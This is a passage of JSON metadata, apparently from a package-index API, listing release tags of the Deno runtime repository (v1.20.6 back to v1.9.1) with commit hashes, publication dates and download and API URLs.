https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:git